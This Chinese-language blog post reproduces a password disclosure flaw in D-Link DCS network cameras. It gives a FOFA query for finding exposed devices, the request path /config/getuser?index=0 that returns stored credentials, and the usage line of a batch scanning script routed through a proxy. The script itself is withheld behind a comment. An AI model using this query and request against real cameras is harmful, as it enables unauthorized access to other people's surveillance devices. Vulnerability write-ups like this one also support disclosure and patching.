漏洞描述
D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者可以根据泄露信息,进入后台
适用范围中小企业设备类型网络摄像机
图象分辨率(dpi)704×480,352×240,176×120压缩方式MPEG4
视频输出音频/视频AV输出操作系统Windows 98SE/ME/2000/XP
![图片[1]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地](https://img.godyu.com/2023/12/20231226124540432.png?imageView2/0/format/webp/q/75)
漏洞复现
fofa:app=”D_Link-DCS-4622″
1.使用poc进行账号密码查看,得到密码登录即可
/config/getuser?index=0![图片[2]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204541685.png?imageView2/0/format/webp/q/75)
![图片[3]-漏洞复现 D-Link DCS 密码泄露漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204542460.png?imageView2/0/format/webp/q/75)
批量验证脚本
评论后获取哦
使用教程:python3 poc.txt -t threads -u urls.txt
这里使用了代理,”socks”:”socks://127.0.0.1:10808″,需要自己更换
THE END
暂无评论内容